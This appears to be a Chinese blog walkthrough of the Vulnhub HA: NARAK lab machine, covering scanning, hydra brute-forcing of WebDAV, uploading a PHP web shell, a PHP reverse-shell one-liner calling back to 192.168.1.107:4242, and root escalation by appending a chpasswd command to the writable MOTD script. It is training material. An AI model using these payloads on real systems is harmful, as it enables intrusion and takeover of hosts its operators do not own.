Vulnhub HA: NARAK 靶机渗透

基础信息

靶机链接:https://www.vulnhub.com/entry/ha-narak,569/
发布日期:2020/09/23
难度:容易/中等
目标:获取标志flag两个(user.txt和root.txt)
运行:VMware Workstation Pro

前言

本次靶机使用的VMware Workstation Pro进行搭建运行,将kali与靶机一样使用桥接模式。本次演练使用kali系统按照渗透测试的过程进行操作,在渗透的时候需要使用webdav漏洞上传木马脚本,在通过该脚本执行nc命令反弹shell,获取shell后,在www-data权限,通过破解密码获取第二个用户shell,最后进行提权。

一、信息收集

1.靶机ip

nmap 192.168.1.0/24

靶机地址为192.168.1.104
Vulnhub HA: NARAK 靶机渗透

2.开放端口服务

nmap -sV -p- -O -A 192.168.1.104

Vulnhub HA: NARAK 靶机渗透1

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

3.网站信息

进入网页发现都是图片,查看源码也没有发现可以利用的信息
Vulnhub HA: NARAK 靶机渗透2
Vulnhub HA: NARAK 靶机渗透3

二、漏洞探测

1.目录扫描

http://192.168.1.104/

Vulnhub HA: NARAK 靶机渗透4访问

http://192.168.1.104/webdav

Vulnhub HA: NARAK 靶机渗透5使用cewl爬取该地址的信息,然后使用hydra进行爆破

cewl 192.168.1.104 -w pass.txt
hydra -L pass.txt  -P pass.txt  192.168.1.104 http-get /webdav

Vulnhub HA: NARAK 靶机渗透6用户: yamdoot 密码: Swarg
登录之后发现什么都没有
Vulnhub HA: NARAK 靶机渗透7

2.搜索webdav

发现了可以利用的漏洞
文章链接:https://charlesreid1.com/wiki/Metasploitable/Apache/DAV
Vulnhub HA: NARAK 靶机渗透8

三、漏洞利用

1.上传木马文件

cadaver http://192.168.1.104/webdav/
put 1.php
木马内容:<?php system($_GET['cmd']);?>

Vulnhub HA: NARAK 靶机渗透9

2.php反弹shell

在第一步上传了可以执行外部命令的木马文件经过测试,可以执行外部命令
Vulnhub HA: NARAK 靶机渗透10

php -r '$sock=fsockopen("192.168.1.107",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
python3 -c "import pty;pty.spawn('/bin/bash')" 升级交互式shell

Vulnhub HA: NARAK 靶机渗透11

3.获取user.txt

在/home/inferno发现第一个flag
Vulnhub HA: NARAK 靶机渗透12

4.信息收集

在/mnt目录下发现hell.sh,查看内容得到一串使用Brainfuck加密的字符串
Vulnhub HA: NARAK 靶机渗透13经过破解获得明文密码
破解密码链接:https://www.splitbrain.org/services/ook
Vulnhub HA: NARAK 靶机渗透14密码:chitragupt
猜测密码是ssh用户的,查看用户名inferno、narak、yamdoot
Vulnhub HA: NARAK 靶机渗透15分别进行登录,在登录inferno用户时成功
Vulnhub HA: NARAK 靶机渗透16

四、提权

使用linpeas.sh查看了利用信息
搭建临时端口将脚本下载到/tmp目录下
赋予脚本执行权限

git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
python3 -m http.server 8001
chmod 777 linpeas.sh

Vulnhub HA: NARAK 靶机渗透17执行发现可写入文件
Vulnhub HA: NARAK 靶机渗透18进入文件发现这是ssh登录时的欢迎界面
Vulnhub HA: NARAK 靶机渗透19我们可以追加一条命令修改root密码,再重新登入ssh写入执行的命令

echo "echo 'root:admin' | sudo chpasswd" >> 00-header

提权成功
Vulnhub HA: NARAK 靶机渗透20进入root路径下获取root.txt
Vulnhub HA: NARAK 靶机渗透21

总结

靶机不是很难适合练手,有利于训练自己的思维

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
大佬不来一句? 抢沙发

请登录后发表评论